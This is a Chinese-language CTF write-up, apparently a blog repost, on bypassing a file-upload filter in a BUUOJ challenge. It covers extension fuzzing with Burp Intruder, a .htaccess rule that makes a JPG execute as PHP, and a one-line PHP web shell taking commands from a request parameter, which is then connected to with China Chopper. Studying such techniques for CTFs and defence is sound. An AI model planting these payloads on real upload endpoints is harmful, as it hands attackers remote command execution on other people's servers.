思考:在實際應用場景中,常規類的檔案上傳、CMS類的檔案上傳、編輯器的上傳或者CTF比賽中的檔案上傳應用場景都有不同的差異;總結下來就是,檔案上傳不管是發現還是利用上都會根據產生層面而不同,常規類無資料的情況下采用常規思路測驗,有資料的情況下直接參考資料進行即可,
https://buuoj.cn/challenges


這里先上傳一些腳本,看看是否有一些提示之類的,

從回應的內容來看,過濾了后綴關鍵字 “ph”,再嘗試一些常規手段,


說明檔案型別與檔案內容也有過濾,
現在我們嘗試換個思路,利用 檔案型別 進行 fuzz 測驗,看一下什么檔案型別沒有被過濾可以繞過上傳,
將資料包發送至 “Intruder” 模塊,針對檔案型別進行變數設定,并匯入 “php_upload_fuzz.txt” 檔案上傳型別爆破字典,嘗試爆破,


發現 “.htaccess” 后綴可以上傳,這樣我們就可以利用前文提到的 “.htaccess” 后綴突破過濾了;
現在考慮的就是 檔案內容過濾檢測,嘗試利用之前提到的 一句話變形 來突破,
先行上傳一個 “.htaccess” 后綴檔案用于決議PHP,
<FilesMatch "shell.jpg">
SetHandler aplication/x-httpd-php
</FilesMatch>

再上傳一個 “shell.jpg” 檔案,檔案內容寫入一句話變形馬,
<script language="php">assert($_REQUEST['cmd'])</script>


菜刀連接后門獲取flag

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/297417.html
標籤:其他
上一篇:滲透之資訊收集(學習筆記)
